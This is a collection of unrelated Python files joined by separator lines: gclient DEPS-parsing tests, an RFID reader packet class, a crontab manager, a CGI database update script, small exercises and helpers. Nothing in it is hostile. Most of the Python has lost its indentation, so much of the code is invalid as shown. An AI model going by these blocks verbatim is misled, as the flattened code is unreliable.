' "url": "https://example.com/dep.git@" + Var("dep_revision"),',
'',
' "condition": "some_condition",',
' },',
'}',
]
self.assert_gets_and_sets_revision(before, after)
class ParseTest(unittest.TestCase):
def callParse(self, vars_override=None):
return gclient_eval.Parse('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a{foo}b",',
'}',
]), '<unknown>', vars_override)
def test_supports_vars_inside_vars(self):
deps_file = '\n'.join([
'vars = {',
' "foo": "bar",',
' "baz": "\\"{foo}\\" == \\"bar\\"",',
'}',
'deps = {',
' "src/baz": {',
' "url": "baz_url",',
' "condition": "baz",',
' },',
'}',
])
local_scope = gclient_eval.Parse(deps_file, '<unknown>', None)
self.assertEqual({
'vars': {'foo': 'bar',
'baz': '"bar" == "bar"'},
'deps': {'src/baz': {'url': 'baz_url',
'dep_type': 'git',
'condition': 'baz'}},
}, local_scope)
def test_has_builtin_vars(self):
builtin_vars = {'builtin_var': 'foo'}
deps_file = '\n'.join([
'deps = {',
' "a_dep": "a{builtin_var}b",',
'}',
])
local_scope = gclient_eval.Parse(deps_file, '<unknown>', None, builtin_vars)
self.assertEqual({
'deps': {'a_dep': {'url': 'afoob',
'dep_type': 'git'}},
}, local_scope)
def test_declaring_builtin_var_has_no_effect(self):
builtin_vars = {'builtin_var': 'foo'}
deps_file = '\n'.join([
'vars = {',
' "builtin_var": "bar",',
'}',
'deps = {',
' "a_dep": "a{builtin_var}b",',
'}',
])
local_scope = gclient_eval.Parse(deps_file, '<unknown>', None, builtin_vars)
self.assertEqual({
'vars': {'builtin_var': 'bar'},
'deps': {'a_dep': {'url': 'afoob',
'dep_type': 'git'}},
}, local_scope)
def test_override_builtin_var(self):
builtin_vars = {'builtin_var': 'foo'}
vars_override = {'builtin_var': 'override'}
deps_file = '\n'.join([
'deps = {',
' "a_dep": "a{builtin_var}b",',
'}',
])
local_scope = gclient_eval.Parse(
deps_file, '<unknown>', vars_override, builtin_vars)
self.assertEqual({
'deps': {'a_dep': {'url': 'aoverrideb',
'dep_type': 'git'}},
}, local_scope, str(local_scope))
def test_expands_vars(self):
local_scope = self.callParse()
self.assertEqual({
'vars': {'foo': 'bar'},
'deps': {'a_dep': {'url': 'abarb',
'dep_type': 'git'}},
}, local_scope)
def test_overrides_vars(self):
local_scope = self.callParse(vars_override={'foo': 'baz'})
self.assertEqual({
'vars': {'foo': 'bar'},
'deps': {'a_dep': {'url': 'abazb',
'dep_type': 'git'}},
}, local_scope)
def test_no_extra_vars(self):
deps_file = '\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a{baz}b",',
'}',
])
with self.assertRaises(KeyError) as cm:
gclient_eval.Parse(deps_file, '<unknown>', {'baz': 'lalala'})
self.assertIn('baz was used as a variable, but was not declared',
str(cm.exception))
def test_standardizes_deps_string_dep(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": "a_url@a_rev",',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git'}},
}, local_scope)
def test_standardizes_deps_dict_dep(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": {',
' "url": "a_url@a_rev",',
' "condition": "checkout_android",',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git',
'condition': 'checkout_android'}},
}, local_scope)
def test_ignores_none_in_deps_os(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": "a_url@a_rev",',
'}',
'deps_os = {',
' "mac": {',
' "a_dep": None,',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git'}},
}, local_scope)
def test_merges_deps_os_extra_dep(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": "a_url@a_rev",',
'}',
'deps_os = {',
' "mac": {',
' "b_dep": "b_url@b_rev"',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git'},
'b_dep': {'url': 'b_url@b_rev',
'dep_type': 'git',
'condition': 'checkout_mac'}},
}, local_scope)
def test_merges_deps_os_existing_dep_with_no_condition(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": "a_url@a_rev",',
'}',
'deps_os = {',
' "mac": {',
' "a_dep": "a_url@a_rev"',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git'}},
}, local_scope)
def test_merges_deps_os_existing_dep_with_condition(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": {',
' "url": "a_url@a_rev",',
' "condition": "some_condition",',
' },',
'}',
'deps_os = {',
' "mac": {',
' "a_dep": "a_url@a_rev"',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {
'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git',
'condition': '(checkout_mac) or (some_condition)'},
},
}, local_scope)
def test_merges_deps_os_multiple_os(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps_os = {',
' "win": {'
' "a_dep": "a_url@a_rev"',
' },',
' "mac": {',
' "a_dep": "a_url@a_rev"',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {
'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git',
'condition': '(checkout_mac) or (checkout_win)'},
},
}, local_scope)
def test_fails_to_merge_same_dep_with_different_revisions(self):
with self.assertRaises(gclient_eval.gclient_utils.Error) as cm:
gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": {',
' "url": "a_url@a_rev",',
' "condition": "some_condition",',
' },',
'}',
'deps_os = {',
' "mac": {',
' "a_dep": "a_url@b_rev"',
' },',
'}',
]), '<unknown>')
self.assertIn('conflicts with existing deps', str(cm.exception))
def test_merges_hooks_os(self):
local_scope = gclient_eval.Parse('\n'.join([
'hooks = [',
' {',
' "action": ["a", "action"],',
' },',
']',
'hooks_os = {',
' "mac": [',
' {',
' "action": ["b", "action"]',
' },',
' ]',
'}',
]), '<unknown>')
self.assertEqual({
"hooks": [{"action": ["a", "action"]},
{"action": ["b", "action"], "condition": "checkout_mac"}],
}, local_scope)
if __name__ == '__main__':
level = logging.DEBUG if '-v' in sys.argv else logging.FATAL
logging.basicConfig(
level=level,
format='%(asctime).19s %(levelname)s %(filename)s:'
'%(lineno)s %(message)s')
unittest.main()
|
# Write a program called alice_words.py that creates a text file named alice_words.txt
# containing an alphabetical listing of all the words,
# and the number of times each occurs, in the text version of Alice’s Adventures in Wonderland.
# The first 10 lines of your output file should look something like this:
#
# Word Count
# =======================
# a 631
# a-piece 1
# abide 1
# able 1
# about 94
# above 3
# absence 1
# absurd 2
import re
def alice_words(alice):
wordtally = {}
alicehandle = open(alice, "r")
lines = alicehandle.readlines()
alicehandle.close()
words = re.findall("[a-zA-Z]+", " ".join(lines)) # easiest way to get rid of \n etc in txt
for word in words:
word = word.lower() # finally a string, so a chance to lowercase it
wordtally[word] = wordtally.get(word, 0) + 1
wordlist = list(wordtally.items())
wordlist.sort()
alicefile = open("alice_words.txt", "w")
alicefile.write("\n")
alicefile.write("Word")
alicefile.write(" ")
alicefile.write("Count\n")
alicefile.write("=======================\n")
for i in wordlist:
alicefile.write(i[0])
alicefile.write(str(i[1]).rjust((23-len(i[0])))) # 23 characters until end of 'Count', so right align to there
alicefile.write("\n")
alicefile.close()
alice_words(r"C:\Users\Matthijs\Programming\ThinkPython\src\Twentieth Chapter\alice_in_wonderland.txt")
# NB: English syntax poses a problem here: omitting ' in the RE FindAll method means "Alice's" is treated as
# one instance of the word "Alice" and one instance of the word "s". It also leads to pseudowords like "doesn".
# Conversely, including the ' leads to the appearance of many words that open a sequence in quote marks in the text,
# e.g. " 'besides ". The latter seems more distorting than the former, so I have omitted the (possessive) apostrophe.
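# A small illustration of the apostrophe trade-off described above, using a made-up
# sentence rather than the book text: dropping the apostrophe splits "Alice's" into
# "Alice" and "s", while keeping it glues opening quote marks onto words.
if __name__ == "__main__":
    sample = "Alice's cat said 'besides, it works'"
    print(re.findall("[a-zA-Z]+", sample))   # ['Alice', 's', 'cat', 'said', 'besides', 'it', 'works']
    print(re.findall("[a-zA-Z']+", sample))  # ["Alice's", 'cat', 'said', "'besides", 'it', "works'"]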
|
# -*- coding: utf-8 -*-
# -------
# Class that represents a packet to communicate with a IND903 device
# author: espinr
# -------
#===============================================================================
#
# Definition of data packets with commands to IND903
# [ Head | Len | Address | Cmd | Data[0…N] | Check ]
# | | | | | |
# | | | | | |> (1 Byte) Checksum. Check all the bytes except itself.
# | | | | |> (n Bytes) Command parameters
# | | | |> (1 Byte) Command byte (list of commands)
# | | |> (1 Byte) Reader’s address. The common addresses are 0~ 254(0xFE),
# | | 255(0xFF) is the public address.
# | | The reader accepts the address of itself and the public address.
# | |> (1 Byte) Length of the packet bytes. Starts from the third byte.
# |> (1 Byte) Head of the packet. (Always 0xA0)
#
# Definition of response data packets
# [ Head | Len | Address | Data[0…N] | Check ]
# | | | | |
# | | | | |> (1 Byte) Checksum. Check all the bytes except itself.
# | | | |> (n Bytes) Data from the reader
# | | |> (1 Byte) Reader’s address.
# | |> (1 Byte) Length of the packet bytes. Starts from the third byte.
# |> (1 Byte) Head of the packet. (Always 0xA0)
#===============================================================================
import binascii
class Ind903PacketException(Exception):
pass
class Ind903Packet(object):
# Definition of commands and packets
    PACKET_HEAD = 0xA0  # All packets start with 0xA0
    # Component index in the array of bytes
    INDEX_HEAD = 0
    INDEX_LENGTH = 1
    INDEX_ADDRESS = 2
    INDEX_CMD = 3
    INDEX_DATA_START = 4
# Commands already implemented
CMD_GET_FIRMWARE_VERSION = b"\x72"
CMD_NAME_REAL_TIME_INVENTORY = b"\x89"
CMD_SET_WORKING_ANTENNA = b"\x74"
# Packets predefined
#PACKET_GET_FIRMWARE_VERSION = b"\xA0\x03\x01\x72\xEA"
#PACKET_NAME_REAL_TIME_INVENTORY = b"\xA0\x04\x01\x89\x01\xD1"
#PACKET_SET_WORKING_ANTENNA = b"\xA0\x04\x01\x74\x00\xE7"
ERRORCODE_COMMAND_SUCCESS = b'\x10'
def __init__(self, head, length, address, cmd, data, check):
"""
Create a packet with the data specified
:param head: (bytes) head of the packet
:param length: (bytes) length of the packet
:param address: (bytes) address of the reader
:param cmd: (bytes) cmd of the packet
:param data: (bytes) data bytes in the packet [0..n]
:param check: (bytes) checksum of the packet
"""
self.head = head
self.length = length
self.address = address
self.cmd = cmd
self.data = bytearray() if (data == None) else data
self.check = check
self.packet = bytearray(self.head+self.length+self.address+self.cmd+self.data+self.check)
def parsePacket(packetData):
"""
Static method to parse and extract the packet information into the structure
:param packetData: hexadecimal bytes corresponding to the packet
"""
try:
packet = bytearray(packetData)
head = packet[Ind903Packet.INDEX_HEAD].to_bytes(1, byteorder='big', signed=False)
length = packet[Ind903Packet.INDEX_LENGTH].to_bytes(1, byteorder='big', signed=False)
address = packet[Ind903Packet.INDEX_ADDRESS].to_bytes(1, byteorder='big', signed=False)
cmd = packet[Ind903Packet.INDEX_CMD].to_bytes(1, byteorder='big', signed=False)
data = bytearray(packet[Ind903Packet.INDEX_DATA_START:len(packet)-1])
check = packet[len(packet)-1].to_bytes(1, byteorder='big', signed=False)
return Ind903Packet(head, length, address, cmd, data, check)
        except Exception as error:
            raise Ind903PacketException('Error parsing the packet {!r}'.format(packetData)) from error
parsePacket = staticmethod(parsePacket)
def toString(self):
"""
:return: The complete packet as a list of bytes in a string
"""
printable = '[ '
printable += binascii.hexlify(self.head).decode() + ' | '
printable += binascii.hexlify(self.length).decode() + ' | '
printable += binascii.hexlify(self.address).decode() + ' | '
printable += binascii.hexlify(self.cmd).decode() + ' | '
for b in self.data:
printable += format(b, '02X') + ' '
printable += '| ' + binascii.hexlify(self.check).decode() + ' ]'
return printable.upper()
def getChecksumPacket(packetToCheck):
"""
Static method that calculates the checksum of the list of bytes. The checksum will be generated using this function
unsigned char CheckSum(unsigned char *uBuff, unsigned char uBuffLen){
unsigned char i,uSum=0;
for(i=0;i<uBuffLen;i++){
uSum = uSum + uBuff[i];
}
uSum = (~uSum) + 1;return uSum;
}
:param packetToCheck: list of bytes, to check
:return: (byte) the checksum of the packet as hex
"""
        intSum = 0
        for x in packetToCheck:
            intSum = intSum + x
        # two's complement of the low byte of the sum, truncated to one unsigned byte
        intSum = ((~intSum) + 1) & 0xFF
        return intSum.to_bytes(1, byteorder='big', signed=False)
getChecksumPacket = staticmethod(getChecksumPacket)
def isEndRealTimeInventory(self):
"""
Check if the current packet indicates the end of an inventory. It is expected to be a response of CMD_NAME_REAL_TIME_INVENTORY command from the reader.
If the reader finished reading tags, it may send two types of responses:
Success:
Head Len Address Cmd Ant_ID Total_Read Check
0xA0 0x08 X 0x89 Y 4 bytes Z
(Total read is the number of tags read during the inventory round)
Error:
Head Len Address Cmd Error_Code Check
0xA0 0x04 X 0x89 Y Z
:return: (byte) with the error code of the result 0x10 for command_success
"""
        if self.cmd != self.CMD_NAME_REAL_TIME_INVENTORY:
            raise Ind903PacketException('Received command is {!r}, not {!r}'.format(
                self.cmd, self.CMD_NAME_REAL_TIME_INVENTORY))
if (self.length == b'\x08' and len(self.data) == 5):
return self.ERRORCODE_COMMAND_SUCCESS
# In other case, an error was found, raise an exception
elif (self.length == b'\x04' and len(self.data) == 1):
return self.data[0]
return b'\x00'
def isCommand(self, cmd):
"""
Check if the current packet is the command sent as parameter
:param cmd: (byte) with the command to compare
"""
return (self.cmd == cmd)
def getTagEPCFromInventoryData(self):
"""
Extracts the information corresponding to the EPC in the data stored. It's a packet corresponding to
the response of a command x89. Data is structured as:
Freq_Ant (1 byte): The high 6 bits are frequency parameter; the low 2 bits are antenna ID.)
PC (2 bytes): Tag’s PC.
EPC (>=12 bytes) Tag’s EPC.
RSSI (1 byte): The RSSI (-dBm) when tag is identified.
"""
if (not self.isCommand(self.CMD_NAME_REAL_TIME_INVENTORY)):
raise Ind903PacketException('Reading tag EPC from a packet with a unknown command '+self.toString())
if (len(self.data)<5):
raise Ind903PacketException('Reading tag EPC from a too short packet '+self.toString())
return self.data[3:len(self.data)-1];
def generatePacketSetAntenna(addressAntenna=b'\x00'):
"""
Static method to generate a packet to set the antenna (by default, \x00 -> antenna 01).
:param addressAntenna: hexadecimal byte corresponding to the id of the antenna (00 by default)
"""
subpacket = bytearray(b'\xA0\x04\x01\x74' + addressAntenna)
return Ind903Packet.parsePacket(bytearray(subpacket + Ind903Packet.getChecksumPacket(subpacket)))
generatePacketSetAntenna = staticmethod(generatePacketSetAntenna)
def generatePacketStartRealTimeInventory(channel=b'\x01'):
"""
Static method to generate a packet to start an inventory round. In data, there is the channel
(How many RF carrier frequency hopping channels are going to be used per inventory round)
:param channel: hexadecimal byte corresponding to the channel (01 by default)
"""
subpacket = bytearray(b"\xA0\x04\x01\x89" + channel)
return Ind903Packet.parsePacket(bytearray(subpacket + Ind903Packet.getChecksumPacket(subpacket)))
generatePacketStartRealTimeInventory = staticmethod(generatePacketStartRealTimeInventory)
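# A minimal usage sketch (assumed example, not part of the original module): build the two
# predefined command packets and print their byte layout; the checksums match the values
# noted in the commented-out constants above.
if __name__ == '__main__':
    set_antenna = Ind903Packet.generatePacketSetAntenna(b'\x00')
    inventory = Ind903Packet.generatePacketStartRealTimeInventory(b'\x01')
    print(set_antenna.toString())  # [ A0 | 04 | 01 | 74 | 00 | E7 ]
    print(inventory.toString())    # [ A0 | 04 | 01 | 89 | 01 | D1 ]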
|
import numpy as np
import scipy.sparse
def assert_finite(X):
"""Assert numpy or scipy matrix is finite."""
X = X.data if scipy.sparse.issparse(X) else X
assert np.all(np.isfinite(X))
return True
def assert_array_equal(X, Y):
"""Assert two arrays to be equal, whether sparse or dense."""
assert X.shape == Y.shape
if scipy.sparse.issparse(X) and scipy.sparse.issparse(Y):
X = X.tocsr()
Y = Y.tocsr()
np.testing.assert_array_equal(X.data, Y.data)
np.testing.assert_array_equal(X.indices, Y.indices)
np.testing.assert_array_equal(X.indptr, Y.indptr)
else:
X = np.asarray(X)
Y = np.asarray(Y)
np.testing.assert_array_equal(X, Y)
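# A brief, illustrative usage of the helpers above (assumed example data): both helpers
# work on dense numpy arrays as well as on scipy sparse matrices.
if __name__ == "__main__":
    dense = np.array([[1.0, 0.0], [0.0, 2.0]])
    sparse = scipy.sparse.csr_matrix(dense)
    assert_finite(dense)
    assert_finite(sparse)
    assert_array_equal(sparse, scipy.sparse.csr_matrix(dense))
    assert_array_equal(dense, dense.copy())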
|
from . import LC_Net_v3
from . import LC_Net_v2
from . import LC_Net
from . import RAZ_loc
|
#!/usr/bin/env python
"""
Service build script.
"""
from nspawn.build import *
# load shared config
import os
import runpy
this_dir = os.path.dirname(os.path.abspath(__file__))
arkon = runpy.run_path(f"{this_dir}/arkon.py")
image_url = arkon['image_url']
alpine_url = arkon['alpine_url']
service_config = arkon['service_config']
machine_name = service_config['machine_name']
service_log_dir = service_config['service_log_dir']
service_store_dir = service_config['service_store_dir']
#
# perform build
#
IMAGE(image_url)
PULL(alpine_url)
WITH(
Boot='yes',
KillSignal="SIGUSR1",
)
# nginx storage folder
WITH(Bind=service_store_dir + '/')
# system logging
WITH(Bind=f"{service_log_dir}:/var/log/")
# default config
COPY("/etc")
COPY("/root")
# configure host name
CAST("/etc/hostname",
machine_name=machine_name,
)
# configure amazon file sync
CAST("/etc/file_sync_s3/arkon.ini",
service_config=service_config,
)
# basic system setup
SH("apk update")
SH("apk upgrade")
SH("apk add tzdata")
SH("apk add ca-certificates")
SH("apk add busybox-initscripts")
SH("apk add mc htop pwgen")
SH("apk add syslog-ng logrotate")
SH("apk add dhcpcd openssh")
# provide amazon file sync
SH("apk add inotify-tools")
SH("apk add python3 py3-pip")
SH("pip3 install file_sync_s3")
SH("file_sync_s3_install")
# ensure system services
SH("rc-update add syslog-ng")
SH("rc-update add dhcpcd")
SH("rc-update add crond")
SH("rc-update add sshd")
# container ssh access
SH("""
echo 'PubkeyAuthentication yes' >> /etc/ssh/sshd_config
echo 'PasswordAuthentication no' >> /etc/ssh/sshd_config
user=root; pass=$(pwgen -s 64 1); echo $user:$pass | chpasswd
""")
PUSH()
|
#!/bin/env python
"""
Setuptools file for pyyamlconfig
"""
from setuptools import (
setup,
find_packages,
)
setup(
name='pyyamlconfig',
author='marhag87',
author_email='marhag87@gmail.com',
url='https://github.com/marhag87/pyyamlconfig',
version='0.2.4',
packages=find_packages(),
license='WTFPL',
description='Load configuration file in yaml format',
    long_description='Load configuration file in yaml format',
install_requires=['PyYAML'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Programming Language :: Python :: 3',
],
test_suite='nose.collector',
tests_require=['nose'],
)
|
class Solution(object):
def sortColors(self, nums):
"""
:type nums: List[int]
:rtype: void Do not return anything, modify nums in-place instead.
"""
N = len(nums)
p0, p2 = 0, N - 1
i = 0
while not (i > p2 or p0 > N - 1 or p2 < 0):
if nums[i] == 1:
i += 1
elif nums[i] == 0:
if i == p0:
i += 1
p0 += 1
else:
if nums[i] != nums[p0]: # do not change the equal value
nums[i], nums[p0] = nums[p0], nums[i]
p0 += 1
elif nums[i] == 2:
if nums[i] != nums[p2]: # do not change the equal value
nums[i], nums[p2] = nums[p2], nums[i]
p2 -= 1
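# A small illustrative check of the single-pass, in-place sort above (hypothetical input,
# not from the original snippet): zeros, ones and twos end up grouped in order.
if __name__ == "__main__":
    colors = [2, 0, 2, 1, 1, 0]
    Solution().sortColors(colors)
    print(colors)  # expected: [0, 0, 1, 1, 2, 2]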
|
#!/usr/bin/python3
import cgi
import json
import psycopg2
from datetime import datetime, timedelta
try:
date_object = datetime.today()
date_string = date_object.strftime("%Y-%m-%d")
arguments = cgi.FieldStorage()
uuid = arguments.getvalue("id")
liter = arguments.getvalue("liter")
comment = arguments.getvalue("comment")
conn = psycopg2.connect("host=yourHost dbname=yourDB user=yourUser password=yourPassword")
cur = conn.cursor()
cur.execute("UPDATE trees SET watered_at = %s, watered = %s,comment = %s WHERE tree_id = %s", (date_string, liter, comment ,uuid))
conn.commit()
cur.close()
conn.close()
print ("Content-type: application/json")
print ()
print ('{"request" : "done"}')
except Exception as error:
print ("Content-type: application/json")
print ()
print ('{"request" : "error"}')
|
"""
Write a program that has a function called escreva(),
which receives any text as a parameter and prints the
message framed with an adaptable width.
Ex:
escreva('Olá, Mundo!')
Output
------------
Olá, Mundo
------------
"""
def escreva(msg):
tam = len(msg)+4
print('~' *tam)
print(f' {msg}')
print('~'* tam)
escreva('Everton Dutra')
escreva('Eduardo')
escreva('Anne')
escreva('Graziele')
|
#!/usr/local/bin/python
from rasa.nlu.convert import convert_training_data
from subprocess import call, run
import os
cmd = ['npx chatito --format rasa data/']
p = call(cmd, shell=True, cwd=os.path.dirname(__file__))
convert_training_data(data_file="rasa_dataset_training.json", out_file="nlu.md", output_format="md", language="")
|
#!/usr/bin/env python3
"""Unit-tested functions for cronctl"""
from collections import namedtuple
import subprocess
import re
import logging
import shlex
from pathlib import Path
import difflib
ROBOT_DEF_REGEX = re.compile(r'^(#|//)(?P<type>[A-Z]*):cron:(?P<def>.*)$', re.MULTILINE)
CRON_DEF_REGEX = re.compile(r"""
^(
[#].* # comment
|\S+=.* # var assign
|(?P<time1>@\S+)\s+(?P<cmd1>\S.*) # time spec shortcut ie @reboot
|(?P<time2>([-0-9/*,]+\s+){5})(?P<cmd2>\S.*) # common format
|\s* # empty line
)$
""", re.VERBOSE)
TYPE_CHARS_DESCRIPTION = {
'P': 'production',
'D': 'devel',
'T': 'test',
'S': 'support',
'I': 'internal',
'R': 'robots'
}
TYPE_CHARS_ORDER = 'PRTDSI'
RobotDef = namedtuple('RobotDef', ('fullname', 'cron_def', 'type_chars'))
CronLine = namedtuple('CronLine', ('robot_def', 'text'))
def list_paths(paths):
"""List all robots sorted by type"""
abs_paths = to_abs_paths(paths)
robots = get_all_robots(abs_paths)
present_types = sort_robots(get_present_types(robots))
list_robots(robots, present_types)
def sort_robots(robot_types):
"""Sort robot type chars by TYPE_CHARS_ORDER"""
return sorted(robot_types, key=get_sort_robots_weight)
def get_sort_robots_weight(robot_type):
"""Calculate robot type weight for sorting"""
weight = TYPE_CHARS_ORDER.find(robot_type)
return weight if weight > -1 else len(TYPE_CHARS_ORDER)
def list_robots(robots, present_types):
"""Print given robots grouped by types"""
for type_char in present_types:
print('Jobs for environment {type_char} ({type_description}):'.format(
type_char=type_char,
type_description=TYPE_CHARS_DESCRIPTION.get(type_char, '')
))
for robot in sorted(filter_robots_by_type(robots, type_char)):
print(' {r.fullname:<90} {r.cron_def:<25} {r.type_chars}'.format(r=robot))
print()
return True
def add_paths(paths, type_char, force):
"""Check paths for new robots and update user's crontab"""
abs_paths = to_abs_paths(paths)
robots = filter_robots_by_type(get_all_robots(abs_paths), type_char)
old_crontab = get_crontab_list()
crontab = parse_crontab_list(old_crontab)
new_crontab = update_cron_by_robots(crontab, robots, abs_paths)
return save_changes(old_crontab, new_crontab, force)
def remove_paths(paths, force):
"""Remove all crontab lines containing given paths"""
abs_paths = to_abs_paths(paths)
old_crontab = get_crontab_list()
new_crontab = remove_paths_from_cron(old_crontab, abs_paths)
return save_changes(old_crontab, new_crontab, force)
def save_changes(old_crontab, new_crontab, force):
"""If any diff, show them and save to file"""
if old_crontab == new_crontab:
print('No crontab changes.')
else:
print_diff(old_crontab, new_crontab)
if force or confirm_write():
if write_new_crontab(new_crontab):
print('New crontab successfully written.')
else:
print('An error occurred while writing new crontab.')
return False
return True
def to_abs_paths(paths):
"""Convert list of paths to absolute"""
return [Path(path).resolve() for path in paths]
def update_cron_by_robots(crontab, robots, paths):
"""Update list of CronLine by list of RobotDef"""
output_cron = []
robots_set = {
RobotDef(robot.fullname, robot.cron_def, '')
for robot in robots
}
cron_robots = {
RobotDef(cron.robot_def.fullname, cron.robot_def.cron_def, '')
for cron in crontab
}
paths_parts = [path.parts for path in paths]
output_cron = [
cron.text
for cron in crontab
if cron.robot_def in robots_set or not_in_paths(cron.robot_def.fullname, paths_parts)
] + sorted([
robot.cron_def + ' ' + robot.fullname
for robot in robots_set if robot not in cron_robots
])
return output_cron
def not_in_paths(fullname, paths_parts):
"""Check if file is in any of paths or subdir"""
fullname_parts = Path(fullname).parts
for path in paths_parts:
if fullname_parts[:len(path)] == path:
return False
return True
def confirm_write():
"""Asks the user if agrees to write changes"""
print()
answer = ''
while answer not in ('a', 'y', 'j', 'n'):
answer = input('Really write changes (y/n)? ').lower().strip()
return answer != 'n'
def print_diff(old_crontab, new_crontab):
"""Print diff between lists"""
print('The required crontab changes are:')
diff = difflib.Differ().compare(old_crontab, new_crontab)
print('\n'.join(diff))
def remove_paths_from_cron(crontab_list, paths):
"""Remove all crontab lines containing given paths"""
parsed_cron = parse_crontab_list(crontab_list)
paths_parts = [path.parts for path in paths]
output_cron = [
line.text
for line in parsed_cron
if not_in_paths(line.robot_def.fullname, paths_parts)
]
return output_cron
def parse_crontab_list(crontab_list):
"""Parse crontab content line by line"""
cron_lines = []
for line in crontab_list:
m_line = CRON_DEF_REGEX.match(line)
if m_line:
command = (m_line.group('cmd1') or m_line.group('cmd2') or '').strip()
if command:
command = shlex.split(command)[0]
robot_def = RobotDef(
command,
(m_line.group('time1') or m_line.group('time2') or '').strip(),
''
)
else:
logging.error('Unknown cron line format: "%s"', line)
robot_def = RobotDef('', '', '')
cron_lines.append(CronLine(robot_def, line))
return cron_lines
def get_crontab_list(cmd=('crontab', '-l')):
"""Get list of current user's crontab definitions"""
result = subprocess.run(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True,
check=False
)
return result.stdout.rstrip().split('\n')
def write_new_crontab(records, cmd=('crontab', '-')):
"""Overwrite user's crontab with given records"""
cron_text = '\n'.join(records).rstrip() + '\n'
result = subprocess.run(
cmd,
input=cron_text,
universal_newlines=True,
check=False
)
return result.returncode == 0
def get_all_robots(paths):
"""Get all robots def from all paths"""
defs = []
for path in paths:
if path.is_dir():
for fullname in path.iterdir():
if fullname.is_file():
defs += get_robot_defs_from_file(fullname)
elif path.is_file():
defs += get_robot_defs_from_file(path)
return set(defs)
def get_robot_defs_from_file(fullname):
"""Get robot defs by filename"""
with fullname.open() as fin:
return get_robot_defs(fullname, fin.read())
def get_robot_defs(fullname, source):
"""Scan given source for cron definitions with type"""
return [RobotDef(str(fullname), match.group('def').strip(), match.group('type'))
for match in ROBOT_DEF_REGEX.finditer(source)]
def filter_robots_by_type(robots, type_char):
"""Filter robot defs by type char"""
return (robot for robot in robots if type_char in robot.type_chars)
def get_present_types(robots):
"""Get unique set of types present in given list"""
return {type_char for robot in robots for type_char in robot.type_chars}
|
"""Crossover implementations for continuous solutions kind
"""
# main imports
import random
import sys
import numpy as np
# module imports
from macop.operators.base import Crossover
class BasicDifferentialEvolutionCrossover(Crossover):
"""Basic Differential Evolution implementation for continuous solution
Attributes:
kind: {:class:`~macop.operators.base.KindOperator`} -- specify the kind of operator
Example:
>>> # import of solution and polynomial mutation operator
>>> from macop.solutions.continuous import ContinuousSolution
>>> from macop.operators.continuous.crossovers import BasicDifferentialEvolutionCrossover
>>> solution = ContinuousSolution.random(5, (-2, 2))
>>> list(solution.data)
[-1.3760219186551894, -1.7676655513272022, 1.4647045830997407, 0.4044600469728352, 0.832290311184182]
>>> crossover = BasicDifferentialEvolutionCrossover(interval=(-2, 2))
>>> crossover_solution = crossover.apply(solution)
>>> list(crossover_solution.data)
[-1.7016619497704522, -0.43633033292228895, 2.0, -0.034751768954844, 0.6134819652022994]
"""
def __init__(self, interval, CR=1.0, F=0.5):
""""Basic Differential Evolution crossover initialiser in order to specify kind of Operator and interval of continuous solution
Args:
interval: {(float, float)} -- minimum and maximum values interval of variables in the solution
CR: {float} -- probability to use of new generated solutions when modifying a value of current solution
F: {float} -- degree of impact of the new generated solutions on the current solution when obtaining new solution
"""
super().__init__()
self.mini, self.maxi = interval
self.CR = CR
self.F = F
def apply(self, solution1, solution2=None):
"""Create new solution based on solution passed as parameter
Args:
solution1: {:class:`~macop.solutions.base.Solution`} -- the first solution to use for generating new solution
solution2: {:class:`~macop.solutions.base.Solution`} -- the second solution to use for generating new solution
Returns:
{:class:`~macop.solutions.base.Solution`}: new continuous generated solution
"""
size = solution1.size
solution1 = solution1.clone()
# create two new random solutions using instance and its static method
solution2 = solution1.random(size, interval=(self.mini, self.maxi))
solution3 = solution1.random(size, interval=(self.mini, self.maxi))
# apply crossover on the new computed solution
for i in range(len(solution1.data)):
# use of CR to change or not the current value of the solution using new solutions
if random.uniform(0, 1) < self.CR:
solution1.data[i] = solution1.data[i] + self.F * (solution2.data[i] - solution3.data[i])
# repair solution if necessary
solution1.data = self._repair(solution1)
return solution1
def _repair(self, solution):
"""
Private repair function for solutions if an element is out of bounds of an expected interval
Args:
solution: {:class:`~macop.solutions.base.Solution`} -- the solution to use for generating new solution
Returns:
{ndarray} -- repaired array of float values
"""
return np.array([self.mini if x < self.mini else self.maxi if x > self.maxi else x for x in solution.data])
|
import tensorflow as tf
from tensorflow.python.framework import ops
import sys
import os
BASE_DIR = os.path.dirname(__file__)
sys.path.append(BASE_DIR)
# load custom tf interpolate lib
try:
    if os.path.exists(os.path.join(BASE_DIR, 'tf_interpolate_so.so')):
        interpolate_module = tf.load_op_library(os.path.join(BASE_DIR, 'tf_interpolate_so.so'))
    else:
        raise NotImplementedError("tf_interpolate_so.so was not found; build the custom op first")
except Exception:
    print(f'Attention! Your TensorFlow version should be below 1.14! Yours is {tf.__version__}\n')
    print('Cannot load the tf_interpolate_so custom ops correctly! Check your TensorFlow version!')
